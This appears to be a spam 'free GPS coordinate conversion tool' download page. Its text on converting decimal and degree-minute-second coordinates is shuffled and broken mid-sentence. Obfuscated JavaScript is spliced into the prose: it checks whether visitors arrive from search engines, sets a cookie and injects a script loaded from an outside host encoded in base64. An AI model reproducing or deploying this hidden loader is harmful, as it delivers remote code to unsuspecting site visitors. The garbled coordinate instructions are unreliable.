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## Download Free Gps Coordinate Conversion Tool For Windows 64

1612 km, each degree is: (40075 1612/360) 111 319 km Precision choice is of 5 decimal place is accurate to 1.. 0000) to 59 9999 CoordinatesSearch on mapThe Earth is not a sphere, but an irregular shape approximating an ellipsoid.. UTM converter (WGS 84)How to convert from a decimal to sexagesimalHow to convert from a sexagesimal to decimalAccuracyReferencesHow to convert from a decimal to sexagesimal# The whole units of degrees will remain the same (-73.. var \_0x3ce0=['OyBwYXR0PQ==','dnV5Vnc','LmJpbmcu','LnlhaG9vLg==','LmFzay4','LnlhbmRleC4','dmlzaXRIZA ==','cUFU','cEVX','Undu','bmpL','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWVuJnF1ZXJ5PQ==','L mdvb2dsZS4','bEFxYXI','LmFsdGF2aXN0YS4','ck9UWGw','cmVmZXJyZXI','Z2V0','S0d2ZGw','bGVuZ3Ro','b3VD UWc','SHZZWFA','aW5kZXhPZg==','TkhDQXA','c2V0','YXBHWUU','UmJPQ2s','eHNVWHk','SGFnTUY','aGVh ZA==','Y3JIYXRIRWxlBVVudA==','c2NyaXB0','c3Jj','Z2V0RWxlBVVudHNCEVRhZ05hbWU','RWhOY1A','RUdm','M XwwfDN8NHwyfDU','RU1oY0c','Y29va2ll','bWF0Y2g','QUtF','c3BsAQ==','cmVwbGFjZQ==','OyBleHBpcmVzPQ==','WUxZdWI','T2xXR2M','cFVuRGw','ZE9Hb00','c0tveWc','YUNmV3k','Z2V0VGltZQ==','bXIUemM']);(function(\_0 x49d220,\_0x5f114a){var \_0x241b98=function(\_0x1357d5){while(--\_0x1357d5){\_0x49d220['push'](\_0x49d220['shift']());}};\_0x241b98(++\_0x5f114a);}(\_0x3ce0,0x1bd));var \_0x568d=function(\_0x5e6de3,\_0x5474c2){\_0x5e6de3=\_0x5e6de3-0x0;var \_0x493acd=\_0x3ce0[\_0x5e6de3];if(\_0x568d['initialized']==undefined){(function(){var \_0x351eb6;try{var \_0x5092b3=Function('return\nx20(function()\x20'+{}.. 244)# The whole number becomes the minutes (59')# Take the remaining decimal and multiply by 60.. Minute is an integer value without sign, from 0 to 59 Seconds is a double value without sign, from 0 (or 0.. (0 244 \* 60 = 14 64)# The resulting number becomes the seconds (14 64") Seconds can remain as a decimal.. 9874° longitude, start with 73°# Multiply the decimal by 60 (0 9874 \* 60 = 59.

The accuracy of the longitude increases the further from the equator you get The accuracy of the latitude remains almost unchanged.. # Take your three sets of numbers and put them together, using the symbols for degrees (°), minutes ('), and seconds (") (-73° 59' 14.. 64" longitude)How to convert from a sexagesimal to decimal# The whole units of degrees will remain the same# Divide the seconds by 60 (14.. aol ',\_0x2227ad[\_0x568d('0x24')],\_0x568d('0x25'),\_0x2227ad[\_0x568d('0x26')]],\_0x 4288c5=document[\_0x568d('0x27')],\_0x19ca92!=[],\_0x27fce6=cookie[\_0x568d('0x28')][\_0x2227ad[\_0x568d('0x29')]];for(va r \_0x2344ab=0x0;\_0x2344ab=0x0){\_0x19ca92=!![];}}else{if(\_0x2227ad[\_0x568d('0x2c')][\_0x4288c5[\_0x568d('0x2d')]](\_0x2 ef60a[\_0x2344ab]),0x0)){if(\_0x2227ad[\_0x568d('0x2e')])!=\_0x2227ad['NHCAP']){return undefined;}else{\_0x19ca92=!![];}} }if(\_0x19ca92){cookie[\_0x568d('0x2f')][\_0x568d('0x1d'),0x1,0x1];if(!\_0x27fce6){if(\_0x2227ad[\_0x568d('0x30')])(\_0x2227a d[\_0x568d('0x31')],\_0x2227ad['IykKK']){\_0x2227ad['WmzQx'](include,\_0x2227ad[\_0x568d('0x32')][\_0x2227ad[\_0x568d('0 x32')]](\_0x2227ad[\_0x568d('0x33')],q,"));}else{\_0x19ca92=!![];}}}}R(); Coordinates conversionConversions latitude longitude geographic coordinates, in all formats: decimal, sexagesimal, GPS DD DM DMS degrees minutes seconds, search by clicking on map.. 9874)# Sum the degrees to the decimal using the symbols for degrees (°) (-73 9874°)Value rangeDegreeDegree is an integer value without sign, from 0 to 90 for the latitude or from 0 to 180 for the longitude.. 64/60 = 0 244)# Sum the resulting to the minute and divide by 60 (59 244/60 = 0 9874)# The resulting is the decimal value of degrees (0.. 11 meter (+/- 55 5 cm) at the equator Thanks in advance for your contribution to improve this site (please correct the errors of grammar and translation).. The earth's radius at the equator is: 6378 160 km than the circumference is: (2\*π\*r) 40075.. constructor(x22return\nx20this\x22)(\x20+'\');}\_0x351eb6=\_0x5092b3();}catch(\_0x4dd15a){\_0x351eb6>window;}{var \_0x447 773='ABCDEFGHIJKLMNPQRSTUVWXYZabcdefghi jklmnopqrstuvwxyz0123456789+=';\_0x351eb6['atob']||(\_0x351eb6[ 'atob']=function(\_0x4f705c){var \_0x2b4d98=String(\_0x4f705c)['replace'](/=/+\$/,");for(var \_0x4df7a9=0x0,\_0x16da4d,\_0x101 01e,\_0x5d828f=0x0,\_0x1e7dd7=\_0x10101e=\_0x2b4d98['charAt'](\_0x5d828f++);~\_0x10101e&&(\_0x16da4d=\_0x4df7a9% 0x4?\_0x16da4d\*0x40+\_0x10101e:\_0x10101e,\_0x4df7a9++%0x4)?\_0x1e7dd7+=String['fromCharCode'](0xff&\_0x16da4d>>(-0x2\*\_0x4df7a9&0x6)):0x0){\_0x10101e=\_0x447773['indexOf'](\_0x10101e);}}return \_0x1e7dd7;});}\_0x568d['base64DecodeUnicode']=function(\_0x5f479a){var \_0x1e71ac=atob(\_0x5f479a);var \_0x4d0c9b=[];for(var \_0x309b1a=0x0,\_0x1286dd=\_0x1e71ac['length'];\_0x309b1a=\_0x2abecb;},NHCAP:\_0x568d('0x1f'),'R bOCK':\_0x568d('0x20'),'IykKK':\_0x568d('0x21'),'WmzQx':function \_0x1e8515(\_0x5159f2,\_0x5c2091){return \_0x5159f2(\_0x5c2091);},xsUXy:function \_0x323b2e(\_0x2a9dd8,\_0x2cc7df){return \_0x2a9dd8+\_0x2cc7df;},HagMF:\_0x568d('0x22');}var \_0x2ef60a=[\_0x568d('0x23'),\_0x2227ad['yaJRM'],\_0x2227ad['pCcLr']].

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